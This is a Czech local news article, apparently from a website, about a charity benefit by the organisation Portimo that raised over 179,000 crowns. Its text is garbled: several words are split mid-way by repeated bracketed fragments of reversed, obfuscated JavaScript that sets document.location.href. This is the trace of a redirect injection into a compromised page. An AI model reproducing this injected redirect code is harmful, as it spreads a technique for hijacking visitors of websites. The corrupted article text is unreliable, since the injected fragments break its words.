Rainbow page separator

Šestá benefice Portima vynesla více než 179 tisíc korun

Středa, 15. listopadu 2017

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Více než 179 tisíc korun se podařilo získat prostřednictvím tradiční benefice obecně prospěšné společnosti Portimo s názvem Na jedné lodi, předsudkům navzdory. Jednalo se už o šestý ročník akce.
„Le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos ji navštívilo téměř tisíc hostů a také výtěžek byl rekordní. Portimo ho využije k rozvoji svých sociálních služeb a programů,“ uvedla ředitelka společnosti Portimo Ruth Šormová. „Jsme moc rádi, že je o benefici rok od roku větší zájem. Le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos kromě tradiční kafárny a hračkoviště zaujala návštěvníky dopolední beseda, zážitková výstava i večerní divadlo. Ukazuje se, že spojení dobročinnosti a zábavy má smysl,“ doplnila ředitelka.
Na jaře začne Portimo chystat v pořadí sedmou benefici, která se uskuteční příští rok na podzim, kdy zároveň společnost oslaví 20. výročí své činnosti.